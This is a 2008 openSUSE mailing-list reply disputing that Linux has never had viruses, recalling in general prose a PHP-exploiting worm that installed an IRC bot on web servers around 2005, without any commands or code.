On Mon, 21 Jan 2008, James Knott wrote:-
<snip>
>Anti-virus software is generally not necessary with Linux, unless it's
>being used as a mail or file server in a Windows network. AFIK,
>there's never been a viable Linux virus.
That depends on whether you include worms and trojans under the
definition of a virus. If so, there have been Linux viruses in the wild.
I still have a copy of a loader script and the IRC bot[0] that was
installed by it, grabbed from an infected server just over 2 years
ago[1].
IIRC, the method of infection for that particular worm was to insert
shell commands[2] into a URL passed to a web server running an
exploitable version of PHP. The commands were executed by a root shell
and was used to download the loader script, set its mode to 744 and then
execute that. The script in question downloaded 2 files, one was the IRC
bot, the other was used to search out and try to infect other web
servers.
At the time, I was seeing over 100 different IP addresses daily, each
sending almost the same commands over a period of a several weeks. The
only differences between the commands were the IP address of the server
hosting the loader script and, occasionally, the name of the loader
script.
[0] Compiled using GCC 3.3.6 on a Gentoo system.
[1] File is dated 2005-12-20.
[2] Without digging up my old server logs, I can't be more specific.
Google might have something about it though.
Regards,
David Bolt
--
Team Acorn: http://www.distributed.net/ OGR-P2 @ ~100Mnodes RC5-72 @ ~15Mkeys
SUSE 10.1 32bit | openSUSE 10.2 32bit | openSUSE 10.3 32bit | openSUSE 11.0a0
SUSE 10.1 64bit | openSUSE 10.2 64bit | openSUSE 10.3 64bit
RISC OS 3.6 | TOS 4.02 | openSUSE 10.3 PPC |RISC OS 3.11
--
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
